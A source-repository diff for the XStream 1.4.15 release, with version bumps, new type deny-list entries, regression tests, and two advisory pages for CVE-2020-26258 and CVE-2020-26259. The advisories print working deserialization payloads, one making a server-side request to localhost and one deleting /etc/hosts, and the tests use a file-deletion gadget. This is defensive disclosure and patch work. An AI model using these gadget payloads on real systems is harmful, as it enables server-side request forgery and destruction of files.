Codebase list libxstream-java / 0337d7d
Update upstream source from tag 'upstream/1.4.15' Update to upstream version '1.4.15' with Debian dir 69c069b67ff8bb728fa80d7b38983f2e50a40ea5 Markus Koschany 3 years ago
22 changed file(s) with 502 addition(s) and 71 deletion(s). Raw diff Collapse all Expand all
1010 Before deploying:
1111
1212 copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH
13 username and passwords.
13 username and passwords and also your GPG key and password.
1414
1515 To deploy (optionally adding sources and javadoc jars):
1616 mvn deploy
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
1515 <packaging>pom</packaging>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 <name>XStream Parent</name>
1818 <url>http://x-stream.github.io</url>
1919 <description>
409409 <dependency>
410410 <groupId>com.thoughtworks.xstream</groupId>
411411 <artifactId>xstream</artifactId>
412 <version>1.4.14</version>
412 <version>1.4.15</version>
413413 </dependency>
414414 <dependency>
415415 <groupId>com.thoughtworks.xstream</groupId>
416416 <artifactId>xstream</artifactId>
417 <version>1.4.14</version>
417 <version>1.4.15</version>
418418 <classifier>tests</classifier>
419419 <type>test-jar</type>
420420 <scope>test</scope>
422422 <dependency>
423423 <groupId>com.thoughtworks.xstream</groupId>
424424 <artifactId>xstream</artifactId>
425 <version>1.4.14</version>
425 <version>1.4.15</version>
426426 <classifier>javadoc</classifier>
427427 <scope>provided</scope>
428428 </dependency>
429429 <dependency>
430430 <groupId>com.thoughtworks.xstream</groupId>
431431 <artifactId>xstream-hibernate</artifactId>
432 <version>1.4.14</version>
432 <version>1.4.15</version>
433433 </dependency>
434434 <dependency>
435435 <groupId>com.thoughtworks.xstream</groupId>
436436 <artifactId>xstream-hibernate</artifactId>
437 <version>1.4.14</version>
437 <version>1.4.15</version>
438438 <classifier>javadoc</classifier>
439439 <scope>provided</scope>
440440 </dependency>
441441 <dependency>
442442 <groupId>com.thoughtworks.xstream</groupId>
443443 <artifactId>xstream-jmh</artifactId>
444 <version>1.4.14</version>
444 <version>1.4.15</version>
445445 </dependency>
446446 <dependency>
447447 <groupId>com.thoughtworks.xstream</groupId>
448448 <artifactId>xstream-jmh</artifactId>
449 <version>1.4.14</version>
449 <version>1.4.15</version>
450450 <classifier>javadoc</classifier>
451451 <scope>provided</scope>
452452 </dependency>
453453 <dependency>
454454 <groupId>com.thoughtworks.xstream</groupId>
455455 <artifactId>xstream-benchmark</artifactId>
456 <version>1.4.14</version>
456 <version>1.4.15</version>
457457 </dependency>
458458 <dependency>
459459 <groupId>com.thoughtworks.xstream</groupId>
460460 <artifactId>xstream-benchmark</artifactId>
461 <version>1.4.14</version>
461 <version>1.4.15</version>
462462 <classifier>javadoc</classifier>
463463 <scope>provided</scope>
464464 </dependency>
633633 <groupId>javax.xml.bind</groupId>
634634 <artifactId>jaxb-api</artifactId>
635635 <version>${version.javax.xml.bind.api}</version>
636 </dependency>
637 <dependency>
638 <groupId>com.sun.xml.ws</groupId>
639 <artifactId>jaxws-rt</artifactId>
640 <version>${version.javax.xml.ws.jaxws.rt}</version>
636641 </dependency>
637642
638643 <dependency>
843848 <groupId>org.apache.maven.plugins</groupId>
844849 <artifactId>maven-gpg-plugin</artifactId>
845850 <version>${version.plugin.maven.gpg}</version>
851 <configuration>
852 <keyname>${gpg.keyname}</keyname>
853 <passphraseServerId>${gpg.keyname}</passphraseServerId>
854 </configuration>
846855 </plugin>
847856 <plugin>
848857 <groupId>org.apache.maven.plugins</groupId>
11131122 <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
11141123 <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
11151124 <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
1116 <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg>
1125 <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
11171126 <version.plugin.maven.install>2.2</version.plugin.maven.install>
11181127 <version.plugin.maven.jar>2.2</version.plugin.maven.jar>
11191128 <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
11411150 <version.javax.annotation.api>1.3.2</version.javax.annotation.api>
11421151 <version.javax.inject>2.4.0</version.javax.inject>
11431152 <version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api>
1153 <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 -->
11441154 <version.jmock>1.0.1</version.jmock>
11451155 <version.joda-time>1.6</version.joda-time>
11461156 <version.junit>3.8.1</version.junit>
11541164 <version.org.jdom2>2.0.5</version.org.jdom2>
11551165 <version.org.json>20080701</version.org.json>
11561166 <version.org.openjdk.jmh>1.21</version.org.openjdk.jmh>
1157 <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- java 6 -->
1167 <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 -->
11581168 <version.org.slf4j>1.6.1</version.org.slf4j>
11591169 <version.stax>1.2.0</version.stax>
11601170 <version.stax.api>1.0.1</version.stax.api>
1919 <id>ossrh-staging</id>
2020 <username>your-sonatype.org-id</username>
2121 <password>your-sonatype.org-pwd</password>
22 </server>
22 </server>
23 <server>
24 <id>${gpg.keyname}</id>
25 <password>your-gpg-key-pwd</password>
26 </server>
2327 </servers>
28 <properties>
29 <gpg.keyname>your-gpg-keyname</gpg.keyname>
30 </properties>
2431 </settings>
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream</artifactId>
1919 <packaging>jar</packaging>
141141 <groupId>commons-lang</groupId>
142142 <artifactId>commons-lang</artifactId>
143143 <scope>test</scope>
144 </dependency>
145
146 <dependency>
147 <groupId>com.sun.xml.ws</groupId>
148 <artifactId>jaxws-rt</artifactId>
149 <scope>test</scope>
150 <exclusions>
151 <exclusion>
152 <groupId>javax.xml.ws</groupId>
153 <artifactId>jaxws-api</artifactId>
154 </exclusion>
155 <exclusion>
156 <groupId>com.sun.istack</groupId>
157 <artifactId>istack-commons-runtime</artifactId>
158 </exclusion>
159 <exclusion>
160 <groupId>com.sun.xml.bind</groupId>
161 <artifactId>jaxb-impl</artifactId>
162 </exclusion>
163 <exclusion>
164 <groupId>com.sun.xml.messaging.saaj</groupId>
165 <artifactId>saaj-impl</artifactId>
166 </exclusion>
167 <exclusion>
168 <groupId>com.sun.xml.stream.buffer</groupId>
169 <artifactId>streambuffer</artifactId>
170 </exclusion>
171 <exclusion>
172 <groupId>com.sun.xml.ws</groupId>
173 <artifactId>policy</artifactId>
174 </exclusion>
175 <exclusion>
176 <groupId>com.sun.org.apache.xml.internal</groupId>
177 <artifactId>resolver</artifactId>
178 </exclusion>
179 <exclusion>
180 <groupId>org.glassfish.gmbal</groupId>
181 <artifactId>gmbal-api-only</artifactId>
182 </exclusion>
183 <exclusion>
184 <groupId>org.jvnet</groupId>
185 <artifactId>mimepull</artifactId>
186 </exclusion>
187 <exclusion>
188 <groupId>org.jvnet.staxex</groupId>
189 <artifactId>stax-ex</artifactId>
190 </exclusion>
191 </exclusions>
144192 </dependency>
145193 </dependencies>
146194
336336 private static final Pattern IGNORE_ALL = Pattern.compile(".*");
337337 private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
338338 private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
339 private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream");
339340
340341 /**
341342 * Constructs a default XStream.
641642 }
642643
643644 addPermission(AnyTypePermission.ANY);
644 denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"});
645 denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO});
645 denyTypes(new String[]{
646 "java.beans.EventHandler", //
647 "java.lang.ProcessBuilder", //
648 "javax.imageio.ImageIO$ContainsFilter", //
649 "jdk.nashorn.internal.objects.NativeString" });
650 denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM});
646651 allowTypeHierarchy(Exception.class);
647652 securityInitialized = false;
648653 }
00 /*
11 * Copyright (C) 2006 Joe Walnes.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers.
33 * All rights reserved.
44 *
55 * The software in this package is published under the terms of the BSD
278278 final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF);
279279 XML_NAME_CHARS_4TH.set('-');
280280 XML_NAME_CHARS_4TH.set('.');
281 XML_NAME_CHARS_4TH.set('0', '9');
281 XML_NAME_CHARS_4TH.set('0', '9' + 1);
282282 XML_NAME_CHARS_4TH.set(0xB7);
283283
284284 final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone();
405405 XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1);
406406
407407 XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH);
408 XML_NAME_CHARS_5TH.set(0x300, 0x36F);
409 XML_NAME_CHARS_5TH.set(0x203F, 0x2040);
408 XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1);
409 XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1);
410410
411411 XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone();
412412 XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH);
492492 // First, fast (common) case: nothing to escape
493493 int i = 0;
494494
495 for (; i < length; i++ ) {
496 char c = name.charAt(i);
497 if (c == '$' || c == '_' || c <= 27 || c >= 127) {
495 for (; i < length; i++) {
496 final char c = name.charAt(i);
497 if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') {
498498 break;
499499 }
500500 }
00 /*
11 * Copyright (C) 2005, 2006 Joe Walnes.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers.
33 * All rights reserved.
44 *
55 * The software in this package is published under the terms of the BSD
7676 initialize = elementName.charAt(0) == '[';
7777 }
7878 return Class.forName(elementName, initialize, classLoader);
79 } catch (ClassNotFoundException e) {
79 } catch (final ClassNotFoundException e) {
80 throw new CannotResolveClassException(elementName);
81 } catch (final IllegalArgumentException e) {
8082 throw new CannotResolveClassException(elementName);
8183 }
8284 }
1010 package com.thoughtworks.acceptance;
1111
1212 import java.beans.EventHandler;
13 import java.io.File;
14 import java.io.FileOutputStream;
15 import java.io.IOException;
16 import java.io.InputStream;
17 import java.io.OutputStream;
1318 import java.util.Iterator;
1419
1520 import com.thoughtworks.xstream.XStream;
212217 // OK
213218 }
214219 }
220
221 public void testCannotUseJaxwsInputStreamToDeleteFile() {
222 if (JVM.isVersion(5)) {
223 final String xml = ""
224 + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
225 + " <tempFile>target/junit/test.txt</tempFile>\n"
226 + "</is>";
227
228 xstream.aliasType("is", InputStream.class);
229 try {
230 xstream.fromXML(xml);
231 fail("Thrown " + ConversionException.class.getName() + " expected");
232 } catch (final ForbiddenClassException e) {
233 // OK
234 }
235 }
236 }
237
238 public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException {
239 if (JVM.isVersion(5)) {
240 final File testDir = new File("target/junit");
241 final File testFile = new File(testDir, "test.txt");
242 try {
243 testDir.mkdirs();
244
245 final OutputStream out = new FileOutputStream(testFile);
246 out.write("JUnit".getBytes());
247 out.flush();
248 out.close();
249
250 assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists());
251
252 final String xml = ""
253 + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
254 + " <tempFile>target/junit/test.txt</tempFile>\n"
255 + "</is>";
256
257 xstream.addPermission(AnyTypePermission.ANY); // clear out defaults
258 xstream.aliasType("is", InputStream.class);
259
260 InputStream is = null;
261 try {
262 is = (InputStream)xstream.fromXML(xml);
263 } catch (final ForbiddenClassException e) {
264 // OK
265 }
266
267 assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists());
268
269 byte[] data = new byte[10];
270 is.read(data);
271 is.close();
272
273 assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists());
274 } finally {
275 if (testFile.exists()) {
276 testFile.delete();
277 }
278 if (testDir.exists()) {
279 testDir.delete();
280 }
281 }
282 }
283 }
215284 }
186186 assertBothWays("\"", "<string>&quot;</string>");
187187 }
188188
189 public void testsDigitsOnly() {
190 xstream.alias("0123456789", String.class);
191 assertBothWays("", "<_.0030123456789></_.0030123456789>");
192 }
193
189194 public void testDecimalFormatSymbols() {
190195 final String xml;
191196 if (!JVM.is14()) {
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream-benchmark</artifactId>
1919 <packaging>jar</packaging>
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream-distribution</artifactId>
1919 <packaging>pom</packaging>
2121
2222 <p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is
2323 affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
24 framework</a> with a white list.</p>
24 framework</a> with a whitelist.</p>
2525
2626 <h2 id="description">Description</h2>
2727
108108 input stream.</p>
109109
110110 <h2 id="workaround">Workaround</h2>
111 <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p>
112 <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p>
111 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
112 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p>
113113 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
114114 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
115115 </pre></div>
116 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from
116 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
117117 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
118118 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p>
119119 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
138138
139139 <h2 id="credits">Credits</h2>
140140
141 <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found
142 by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
141 <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was
142 supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
143143
144144 </body>
145145 </html>
0 <html>
1 <!--
2 Copyright (C) 2020 XStream committers.
3 All rights reserved.
4
5 The software in this package is published under the terms of the BSD
6 style license a copy of which has been included with this distribution in
7 the LICENSE.txt file.
8
9 Created on 24. November 2020 by Joerg Schaible
10 -->
11 <head>
12 <title>CVE-2020-26258</title>
13 </head>
14 <body>
15
16 <h2 id="vulnerability">Vulnerability</h2>
17
18 <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
19 from an arbitrary URL referencing a resource in an intranet or the local host.</p>
20
21 <h2 id="affected_versions">Affected Versions</h2>
22
23 <p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if
24 using the version out of the box. No user is affected, who followed the recommendation to setup
25 <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
26
27 <h2 id="description">Description</h2>
28
29 <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
30 XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
31 input stream and replace or inject objects, that result in a server-side forgery request.</p>
32
33 <h2 id="reproduction">Steps to Reproduce</h2>
34
35 <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
36 unmarshal it again with XStream:</p>
37 <div class="Source XML"><pre>&lt;map&gt;
38 &lt;entry&gt;
39 &lt;jdk.nashorn.internal.objects.NativeString&gt;
40 &lt;flags&gt;0&lt;/flags&gt;
41 &lt;value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'&gt;
42 &lt;dataHandler&gt;
43 &lt;dataSource class='javax.activation.URLDataSource'&gt;
44 &lt;url&gt;http://localhost:8080/internal/:&lt;/url&gt;
45 &lt;/dataSource&gt;
46 &lt;transferFlavors/&gt;
47 &lt;/dataHandler&gt;
48 &lt;dataLen&gt;0&lt;/dataLen&gt;
49 &lt;/value&gt;
50 &lt;/jdk.nashorn.internal.objects.NativeString&gt;
51 &lt;string&gt;test&lt;/string&gt;
52 &lt;/entry&gt;
53 &lt;/map&gt;
54 </pre></div>
55 <div class="Source Java"><pre>XStream xstream = new XStream();
56 xstream.fromXML(xml);
57 </pre></div>
58
59 <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
60
61 <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
62
63 <h2 id="impact">Impact</h2>
64
65 <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
66 available only by manipulating the processed input stream.</p>
67
68 <h2 id="workaround">Workaround</h2>
69 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
70 <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
71 simply add two lines to XStream's setup code:</p>
72 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
73 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
74 </pre></div>
75 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
76 code:</p>
77 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
78 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
79 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
80 </pre></div>
81 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
82 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
83 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
84 <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
85 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
86 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
87 xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
88 </pre></div>
89 <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
90 know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
91 <div class="Source Java"><pre>xstream.registerConverter(new Converter() {
92 public boolean canConvert(Class type) {
93 return type != null &amp;&amp; (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
94 || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
95 || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
96 || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
97 }
98
99 public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
100 throw new ConversionException("Unsupported type due to security reasons.");
101 }
102
103 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
104 throw new ConversionException("Unsupported type due to security reasons.");
105 }
106 }, XStream.PRIORITY_LOW);
107 </pre></div>
108
109 <h2 id="credits">Credits</h2>
110
111 <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
112
113 </body>
114 </html>
0 <html>
1 <!--
2 Copyright (C) 2020 XStream committers.
3 All rights reserved.
4
5 The software in this package is published under the terms of the BSD
6 style license a copy of which has been included with this distribution in
7 the LICENSE.txt file.
8
9 Created on 06. December 2020 by Joerg Schaible
10 -->
11 <head>
12 <title>CVE-2020-26259</title>
13 </head>
14 <body>
15
16 <h2 id="vulnerability">Vulnerability</h2>
17
18 <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
19 as the executing process has sufficient rights.</p>
20
21 <h2 id="affected_versions">Affected Versions</h2>
22
23 <p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS
24 runtime, if using the version out of the box. No user is affected, who followed the recommendation to setup
25 <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
26
27 <h2 id="description">Description</h2>
28
29 <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
30 XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
31 input stream and replace or inject objects, that result in a server-side forgery request.</p>
32
33 <h2 id="reproduction">Steps to Reproduce</h2>
34
35 <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
36 unmarshal it again with XStream:</p>
37 <div class="Source XML"><pre>&lt;map&gt;
38 &lt;entry&gt;
39 &lt;jdk.nashorn.internal.objects.NativeString&gt;
40 &lt;flags&gt;0&lt;/flags&gt;
41 &lt;value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'&gt;
42 &lt;dataHandler&gt;
43 &lt;dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'&gt;
44 &lt;contentType&gt;text/plain&lt;/contentType&gt;
45 &lt;is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'&gt;
46 &lt;tempFile&gt;/etc/hosts&lt;/tempFile&gt;
47 &lt;/is&gt;
48 &lt;/dataSource&gt;
49 &lt;transferFlavors/&gt;
50 &lt;/dataHandler&gt;
51 &lt;dataLen&gt;0&lt;/dataLen&gt;
52 &lt;/value&gt;
53 &lt;/jdk.nashorn.internal.objects.NativeString&gt;
54 &lt;string&gt;test&lt;/string&gt;
55 &lt;/entry&gt;
56 &lt;/map&gt;
57 </pre></div>
58 <div class="Source Java"><pre>XStream xstream = new XStream();
59 xstream.fromXML(xml);
60 </pre></div>
61
62 <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
63
64 <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
65
66 <h2 id="impact">Impact</h2>
67
68 <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
69 process has sufficient rights only by manipulating the processed input stream.</p>
70
71 <h2 id="workaround">Workaround</h2>
72 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
73 <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
74 simply add two lines to XStream's setup code:</p>
75 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
76 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
77 </pre></div>
78 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
79 code:</p>
80 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
81 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
82 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
83 </pre></div>
84 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
85 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
86 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
87 <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
88 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
89 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
90 xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
91 </pre></div>
92 <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
93 know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
94 <div class="Source Java"><pre>xstream.registerConverter(new Converter() {
95 public boolean canConvert(Class type) {
96 return type != null &amp;&amp; (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
97 || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
98 || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
99 || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
100 }
101
102 public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
103 throw new ConversionException("Unsupported type due to security reasons.");
104 }
105
106 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
107 throw new ConversionException("Unsupported type due to security reasons.");
108 }
109 }, XStream.PRIORITY_LOW);
110 </pre></div>
111
112 <h2 id="credits">Credits</h2>
113
114 <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
115
116 </body>
117 </html>
3333 <p>Not yet released.</p>
3434 -->
3535
36 <h1 id="1.4.15">1.4.15</h1>
37
38 <p>Released December 13, 2020.</p>
39
40 <p class="highlight">This maintenance release addresses the security vulnerabilities
41 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
42 unmarshalling for XStream instances with uninitialized security framework.</p>
43
44 <h2>Minor changes</h2>
45
46 <ul>
47 <li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li>
48 <li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li>
49 </ul>
50
51 <h2>Stream compatibility</h2>
52
53 <ul>
54 <li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream
55 are now part of the default blacklist and the deserialization of XML containing one of the two types will fail.
56 You will have to enable these types by explicit configuration, if you need them.</li>
57 </ul>
58
59 <h2>Delivery</h2>
60
61 <p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will
62 process only requested classes of the jar file. Until version 1.4.14 XStream was delivered also as special Java 7
63 version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version. However, this
64 special version will not work in a normal Java 8 environment or higher and was never meant do so.</p>
65
66 <p>Unfortunately, this version has to be build always after the standard version due to the build sequence. The
67 latest version in Maven Central however is always the one that has been deployed last independently from the time
68 of publishing. This creates an annoyance now in GitHub for any project using the Dependabot service which creates
69 automated pull requests with updates to the latest XStream version, because it injects now the special Java 7
70 version that probably breaks these projects.</p>
71
72 <p>Users who still require a special version for Java 7 will have to build this artifact now on their own. Users
73 for even older Java environments had always to do so anyway.</p>
74
3675 <h1 id="1.4.14">1.4.14</h1>
3776
3877 <p>Released November 16, 2020.</p>
4584
4685 <ul>
4786 <li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default
48 blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these
49 types by explicit configuration, if you need them.</li>
87 blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable
88 these types by explicit configuration, if you need them.</li>
5089 </ul>
5190
5291 <h1 id="1.4.13">1.4.13</h1>
1717
1818 <p><a href="versioning.html">About XStream version numbers...</a></p>
1919
20 <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1>
20 <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1>
2121
2222 <ul>
23 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b>
23 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b>
2424 Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li>
25 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b>
25 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b>
2626 Contains the complete XStream project as if checked out from the Subversion version tag.</li>
27 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a>
